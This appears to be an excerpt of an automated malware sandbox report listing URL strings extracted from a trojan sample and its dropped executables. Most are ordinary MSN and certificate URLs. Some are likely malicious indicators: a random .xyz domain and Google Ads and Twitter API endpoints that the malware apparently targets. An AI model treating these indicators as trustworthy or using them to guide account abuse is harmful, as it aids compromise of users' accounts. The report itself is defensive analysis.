Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA61Ofl?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AABzUSt?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsAOZ?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADsZuW?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv9IZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhNP?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvhax?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvqEs?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvuGs?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvzqT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xDME?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yG8H?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1kc8s?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMQmHU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBMVUFn?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBS0Ogx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuaWG?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: 1618257864703.exe.6.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0B
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0E
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0F
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0K
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0M
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0P
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp, ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.digicert.com0R
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://ocsp.thawte.com0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_user.dll.6.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_user.dll.6.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://sf.symcd.com0&
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=333&w=311
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv9IZ.img?h=75&w=100&
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=166&w=310
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=166&w=310
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhax.img?h=166&w=310
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvqEs.img?h=166&w=310
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvuGs.img?h=333&w=311
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvzqT.img?h=166&w=310
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xDME.img?h=75&w=100
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yG8H.img?h=166&w=31
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=75&w=100
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMQmHU.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBS0Ogx.img?h=75&w=100&
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuaWG.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.6.dr	String found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.6.dr	String found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.386388489.00000000030F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.interestvideo.com/video1.php
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://www.msn.com
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://www.msn.com/
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecv743B.tmp.11.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1618257864703.exe, 0000000B.00000002.385423543.0000000000198000.00000004.00000010.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: 1618257864703.exe, 1618257864703.exe.6.dr	String found in binary or memory: http://www.nirsoft.net/
Source: download_user.dll.6.dr	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: download_user.dll.6.dr	String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://www.vb-audio.com
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://www.vb-cable.com
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	String found in binary or memory: http://www.vb-cable.comVBCABLE
Source: download_user.dll.6.dr	String found in binary or memory: http://www.xunlei.com/
Source: download_user.dll.6.dr	String found in binary or memory: http://www.xunlei.com/GET
Source: 26FF190E7AE0F7C7.exe	String found in binary or memory: http://www.youtube.com
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.422250133.00000000038C8000.00000004.00000001.sdmp	String found in binary or memory: https://670D67B00237B933.xyz/
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.406518558.00000000038C6000.00000004.00000001.sdmp	String found in binary or memory: https://670D67B00237B933.xyz/T
Source: Localwebdata1618257874860.6.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.379486057.0000000003ED9000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: ecv743B.tmp.11.dr	String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426984843.000000000347C000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.387916412.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
